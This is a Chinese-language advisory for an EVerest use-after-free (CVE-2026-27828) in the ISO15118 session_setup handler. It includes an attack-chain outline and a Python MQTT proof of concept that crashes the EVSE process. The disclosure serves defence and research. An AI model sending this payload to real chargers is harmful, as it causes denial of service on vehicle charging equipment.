CVE-2026-27828 CVSS 7.5 高危

CVE-2026-27828 EVerest释放后重用漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27828

漏洞类型

释放后重用 (UAF)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EVerest

漏洞概述

EVerest电动汽车充电软件堆栈在2026.02.0版本之前存在释放后重用漏洞。当ISO15118初始化失败时，拥有MQTT访问权限的攻击者可发送session_setup命令，导致EVSE进程崩溃。

技术细节

该漏洞位于EVerest的ISO15118充电器实现组件中，属于典型的释放后重用（Use-After-Free）内存安全漏洞。具体问题出在`ISO15118_chargerImpl::handle_session_setup`函数的处理逻辑中。当ISO15118初始化流程因环境问题（例如检测不到IPv6链路本地地址）而失败时，系统会触发`v2g_ctx`上下文对象的释放。然而，代码未能在释放后对后续调用进行有效拦截。此时，若攻击者拥有MQTT接口的访问权限，并发送特定的`session_setup`命令，该函数将尝试引用已被释放的`v2g_ctx`指针。这种非法内存访问将导致EVSE进程发生段错误并崩溃，造成拒绝服务。由于CVSS向量显示无需用户交互且权限要求低，该漏洞具有极高的可利用性。

攻击链分析

STEP 1

步骤1：前置条件触发

EVSE系统处于ISO15118初始化失败状态（例如无IPv6链路本地地址），导致v2g_ctx上下文对象被释放。

STEP 2

步骤2：建立连接

攻击者获取目标EVSE的MQTT接口访问权限，并与代理建立连接。

STEP 3

步骤3：发送恶意命令

攻击者向特定的MQTT主题发送`session_setup`命令。

STEP 4

步骤4：利用漏洞

系统处理命令时，`handle_session_setup`函数尝试访问已释放的`v2g_ctx`内存。

STEP 5

步骤5：系统崩溃

非法内存访问导致EVSE进程崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import paho.mqtt.client as mqtt
import json
import time

# Target configuration
BROKER = "evse-target.local"
PORT = 1883
TOPIC = "iso15118/charger/cmd/session_setup"  # Example topic structure

def on_connect(client, userdata, flags, rc):
    if rc == 0:
        print("[+] Connected to MQTT Broker")
    else:
        print(f"[-] Connection failed with code {rc}")

def exploit():
    client = mqtt.Client()
    client.on_connect = on_connect

    try:
        client.connect(BROKER, PORT, 60)
        client.loop_start()
        time.sleep(1) # Wait for connection

        # Construct malicious payload
        # Triggering the UAF requires sending session_setup when v2g_ctx is freed.
        # This typically happens after ISO15118 init failure.
        payload = {
            "id": "poc_exploit",
            "evcc_id": "sensor/poc"
        }

        print(f"[*] Sending payload to {TOPIC}")
        client.publish(TOPIC, json.dumps(payload))
        print("[+] Payload sent. Check if the process crashed.")

        client.loop_stop()
        client.disconnect()

    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

EVerest < 2026.02.0

防御指南

临时缓解措施

如果无法立即升级，建议通过网络分段严格限制对EVSE MQTT接口的访问权限，禁止未授权设备发送控制指令。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表